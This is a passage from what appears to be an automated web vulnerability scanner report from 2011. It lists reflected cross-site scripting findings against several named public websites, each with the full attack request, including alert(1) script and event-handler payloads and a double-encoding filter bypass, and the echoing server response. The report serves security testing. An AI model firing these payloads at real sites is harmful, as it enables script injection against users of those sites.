Connection: Transfer-Encoding
Set-Cookie: LocaleCookie=en-us; domain=gamestop.com; expires=Fri, 02-Apr-2021 13:33:25 GMT; path=/
Set-Cookie: CookieState=V=1; path=/
Set-Cookie: LandingUrl=http://www.gamestop.com/badurl.aspx?404;http://www.gamestop.com/common/gui/favicon.ico599e8'a='b'629f0608bc6; path=/
Set-Cookie: CampaignHistory=; path=/
Set-Cookie: BIGipServerwww.gamestop.com-80=600446124.20480.0000; path=/
Content-Length: 181788


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<script language='jav
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/badurl.aspx?404;http://www.gamestop.com/common/gui/favicon.ico599e8'a='b'629f0608bc6' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

6.48. http://www.gather.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gather.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 12711<img%20src%3da%20onerror%3dalert(1)>929de4ce53b was submitted in the REST URL parameter 1. This input was echoed as 12711<img src=a onerror=alert(1)>929de4ce53b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /12711<img%20src%3da%20onerror%3dalert(1)>929de4ce53b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gather.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:22 GMT
Server: Apache/2.2.3 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=4A24C55EA8AA587CCF8856C6C9BFB24A; Domain=.gather.com; Path=/
Set-Cookie: vis=RyOcPuDxMFUGP3B0WVrMrdgk+Fv7TLiAW3OByYniiiDpLR+P/Pm0tG1Nows/zVLDfFPcwb2RlnPBjDhfuWVzAqWnKeeDBF1/gMVhlwJ1RSc=; Domain=gather.com; Expires=Fri, 28-Mar-2031 13:34:22 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Set-Cookie: vis=KW1zZbLcDLkbttCjTEPka5YrQnepZ8pHskgphI0gOdszkdWMqudZ95Jb7/76/tOlkeRmmJL7fpmjoICIH6sXwwAd09L9KZQWlUI0WxvLZi3sfdXOAhI/xZQCjpJNlT+R; Domain=gather.com; Expires=Fri, 28-Mar-2031 13:34:22 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Content-Length: 17544
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<em>12711<img src=a onerror=alert(1)>929de4ce53b</em>
...[SNIP]...

6.49. http://www.gather.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gather.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3197c"><a>1af48c031bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /3197c"><a>1af48c031bb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gather.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:05 GMT
Server: Apache/2.2.3 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=DA1461106BFAE965E4902BC6A28B47D8; Domain=.gather.com; Path=/
Set-Cookie: vis=UjjmQmSy0/vTCt18edV5yG7Hdy8T9xl9k7Es17tCqMMJpFjxuqlR5UcQ461iN1fmmD5JU4aHsvhJi8Y6SPee6UXzWH78Piq8kZfJO9L+2ZU=; Domain=gather.com; Expires=Fri, 28-Mar-2031 13:34:05 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Set-Cookie: vis=3O1JaJHhBrlqO2HsxQwvvNgk+Fv7TLiAn1BRbSOCyEOukF3ZG9POyIobiPsZ/q8ko5SAnn39resA8mu0ppEVBXCt9+uNQE6iPrjrPjwNPHYdyAEmmABmC03bbftbh5TG; Domain=gather.com; Expires=Fri, 28-Mar-2031 13:34:05 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Content-Length: 17459
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<meta name="keywordVal" content="3197c"><a>1af48c031bb" >
...[SNIP]...

6.50. http://www.gourmandia.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gourmandia.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98084"><script>alert(1)</script>c7f5e1781ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico98084"><script>alert(1)</script>c7f5e1781ab HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gourmandia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:57:51 GMT
Server: Apache
Set-Cookie: PHPSESSID=m5h7u4477a8qnj9sg8pmkq0895; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<title>4
...[SNIP]...
<form id="testform" action="/404.php/favicon.ico98084"><script>alert(1)</script>c7f5e1781ab" method="post">
...[SNIP]...

6.51. http://www.healthline.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.healthline.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e4f5'%3bd3fe8a4b78d was submitted in the REST URL parameter 1. This input was echoed as 6e4f5';d3fe8a4b78d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico6e4f5'%3bd3fe8a4b78d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
P3P: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 13:41:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51348

<!--
URI: /favicon.ico6e4f5';d3fe8a4b78dservletName: defaultstatusCode: 404
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<
...[SNIP]...
anguage="JavaScript" src="http://ad.doubleclick.net/adj/hn.us.hl.er.x.x.x/none' + btk1 + btk2 + ';kw=generalhealth;k1=none;k2=none;k3=health;pos=lb;ac=32688|32431|32457|35032|32461;pv=;url=/favicon.ico6e4f5';d3fe8a4b78d;type=top_rb;bf=no;tile=' + dfpTileIdx++ + ';sz=728x90;dcopt=ist;ord=' + hlnord + ';u=generalhealth|none|none|health|32688,32431,32457,35032,32461|lb||||/favicon.ico6e4f5';d3fe8a4b78d|top_rb||?" type="
...[SNIP]...

6.52. http://www.healthline.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.healthline.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c252"%3b2599a835db0 was submitted in the REST URL parameter 1. This input was echoed as 7c252";2599a835db0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico7c252"%3b2599a835db0 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
P3P: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 13:41:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51348

<!--
URI: /favicon.ico7c252";2599a835db0servletName: defaultstatusCode: 404
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<
...[SNIP]...
cadc=0;var erpm=0;
/*var unicaEvents = new Array();
var unicaEventIdx = 0;*/
var g_cfn="generalhealth";
var g_cfn_bold = "generalhealth";
var g_encoded_uri = encodeURI("/favicon.ico7c252";2599a835db0");
</script>
...[SNIP]...

6.53. http://www.hollywood.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hollywood.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d966%2522%253balert%25281%2529%252f%252f0182ae2d622 was submitted in the REST URL parameter 1. This input was echoed as 2d966";alert(1)//0182ae2d622 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /favicon.ico2d966%2522%253balert%25281%2529%252f%252f0182ae2d622 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hollywood.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:35:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=zb0r3g55zp22f1foo3vkycei; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15980


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hollywood.com </title>
<script type="text
...[SNIP]...
function _hbEvent(a,b){b=_hbE[_hbEC++]=new Object();b._N=a;b._C=0;return b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX0100u";hbx.gn="h.hollywood.com";
hbx.acct="DM550817IOBZ38EN3";
hbx.pn="404/favicon.ico2d966";alert(1)//0182ae2d622";
hbx.mlc="Error";hbx.pndef="";hbx.ctdef="full";hbx.lt="auto";
hbx.dlf="n";
</script>
...[SNIP]...

6.54. http://www.inc.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.inc.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b186"><script>alert(1)</script>7e885573fb4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4b186"><script>alert(1)</script>7e885573fb4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:20:54 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.11
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from VoxCAST
Content-Length: 40001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="returl" value="http://www.inc.com/favicon.ico4b186"><script>alert(1)</script>7e885573fb4">
...[SNIP]...

6.55. http://www.instructables.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instructables.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 492f7<script>alert(1)</script>1ee22699fd5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico492f7<script>alert(1)</script>1ee22699fd5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.instructables.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.28
P3P: IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA
Cache-Control: no-cache
X-Cacheable: no-404
Content-Length: 17716
Date: Sat, 02 Apr 2011 13:37:19 GMT
X-Varnish: 4085213196
Age: 0
Via: 1.1 varnish
X-Cache-Svr: squid03.instructables.com
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
<p>
&nbsp;&nbsp;We're sorry, the URL http://www.instructables.com/favicon.ico492f7<script>alert(1)</script>1ee22699fd5 is either incorrect or no longer available. Maybe you are looking for one of the following Instructables below.
</p>
...[SNIP]...

6.56. http://www.kaboose.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaboose.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4633</script><script>alert(1)</script>ef96f9ca301 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof4633</script><script>alert(1)</script>ef96f9ca301 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kaboose.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:40:52 GMT
Server: Apache/2.2.11 (Unix) DAV/2 PHP/4.4.9
X-Powered-By: PHP/4.4.9
Set-Cookie: ad_types_404.html=itype%3DBanner2%26itype%3DSponsorLink2%26itype%3DSponsorLink1%26itype%3DRectangle2%26itype%3DSponsorFeature%26itype%3DRectangle%26itype%3DSponsorBar%26itype%3DSkyscraper-Left%26itype%3DSponsorLogo%26itype%3DPeelback2%26itype%3DOverPage%26itype%3DInterstitial%26itype%3DCatfish%26itype%3DPeelback%26itype%3DBanner; expires=Sat, 02 Apr 2011 13:44:52 GMT
Content-Type: text/html; charset=utf-8
X-UA-COMPATIBLE: IE=EmulateIE7
Content-Length: 86182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<he
...[SNIP]...
<script type="text/javascript">
mboxCreate('KAB_Global_Mbox', "pageName=www.kaboose.com/favicon.icof4633</script><script>alert(1)</script>ef96f9ca301");
</script>
...[SNIP]...

6.57. http://www.letssingit.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.letssingit.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0854"><script>alert(1)</script>62f1be08ee8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc0854"><script>alert(1)</script>62f1be08ee8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.letssingit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:59:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: country=us; expires=Monday, 02-May-2011 13:59:11 GMT;path=/; domain=.letssingit.com
Set-Cookie: language=en; expires=Monday, 02-May-2011 13:59:11 GMT;path=/; domain=.letssingit.com
Set-Cookie: session_views=1; path=/; domain=.letssingit.com
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 22702

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Lyrics, albums, songs, artists and more music | LetsSingIt</TITLE>
<META http-equiv="content-type" content="tex
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6772046&amp;c3=&amp;c4=www.letssingit.com/favicon.icoc0854"><script>alert(1)</script>62f1be08ee8&amp;c5=&amp;c6=&amp;c15=&amp;cj=1"/>
...[SNIP]...

6.58. http://www.letssingit.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.letssingit.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc674"-alert(1)-"1a90c41c69d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icocc674"-alert(1)-"1a90c41c69d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.letssingit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:59:12 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: country=us; expires=Monday, 02-May-2011 13:59:12 GMT;path=/; domain=.letssingit.com
Set-Cookie: language=en; expires=Monday, 02-May-2011 13:59:12 GMT;path=/; domain=.letssingit.com
Set-Cookie: session_views=1; path=/; domain=.letssingit.com
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 22681

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Lyrics, albums, songs, artists and more music | LetsSingIt</TITLE>
<META http-equiv="content-type" content="tex
...[SNIP]...
<script type="text/javascript">COMSCORE.beacon({c1:2,c2:"6772046",c3:"",c4:"www.letssingit.com/favicon.icocc674"-alert(1)-"1a90c41c69d",c5:"",c6:"",c15:""});</script>
...[SNIP]...

6.59. http://www.mainstreet.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mainstreet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5ac2"><script>alert(1)</script>25e47d014c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof5ac2"><script>alert(1)</script>25e47d014c2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mainstreet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:04:47 GMT
Server: Apache
Set-Cookie: SESS0e250a232fad80ec5d88c23e55d760d9=u0phpluvnnfdapsm79149neq37; expires=Mon, 25 Apr 2011 17:38:07 GMT; path=/; domain=.mainstreet.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:04:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
X-Debug: msweb04
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Node type: site_content (4100)
Node title: 404 Page
Last Generated: 20110
...[SNIP]...
<link rel="canonical" href="http://www.mainstreet.com/favicon.icof5ac2"><script>alert(1)</script>25e47d014c2" />
...[SNIP]...

6.60. http://www.manta.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f6ae0<script>alert(1)</script>b625fad29ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof6ae0<script>alert(1)</script>b625fad29ae HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 12:43:10 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4714
X-Varnish: 2363475455
Via: 1.1 varnish
X-Served-By: ecnext42
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<br>
Access Denied: http://www.manta.com/favicon.icof6ae0<script>alert(1)</script>b625fad29ae at Sat Apr 2 12:43:10 2011 +0000 from 173.193.214.243<br>
...[SNIP]...

6.61. http://www.manta.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d5c"><script>alert(1)</script>8122b86cb15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico56d5c"><script>alert(1)</script>8122b86cb15 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 12:43:10 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4718
X-Varnish: 2363475440
Via: 1.1 varnish
X-Served-By: ecnext42
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.manta.com/favicon.ico56d5c"><script>alert(1)</script>8122b86cb15 at Sat Apr 2 12:43:10 2011 +0000 from 173.193.214.243">
...[SNIP]...

6.62. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b779f<script>alert(1)</script>fb24f2fd142 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?b779f<script>alert(1)</script>fb24f2fd142=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 12:42:43 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4720
X-Varnish: 3115951942
Via: 1.1 varnish
X-Served-By: ecnext41
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<br>
Access Denied: http://www.manta.com/favicon.ico?b779f<script>alert(1)</script>fb24f2fd142=1 at Sat Apr 2 12:42:43 2011 +0000 from 173.193.214.243<br>
...[SNIP]...

6.63. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c655a"><script>alert(1)</script>db5a4dbfb1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?c655a"><script>alert(1)</script>db5a4dbfb1a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 12:42:43 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4724
X-Varnish: 1295727862
Via: 1.1 varnish
X-Served-By: ecnext43
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.manta.com/favicon.ico?c655a"><script>alert(1)</script>db5a4dbfb1a=1 at Sat Apr 2 12:42:43 2011 +0000 from 173.193.214.243">
...[SNIP]...

6.64. http://www.marthastewart.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marthastewart.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4257a"-alert(1)-"d960cce6c75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

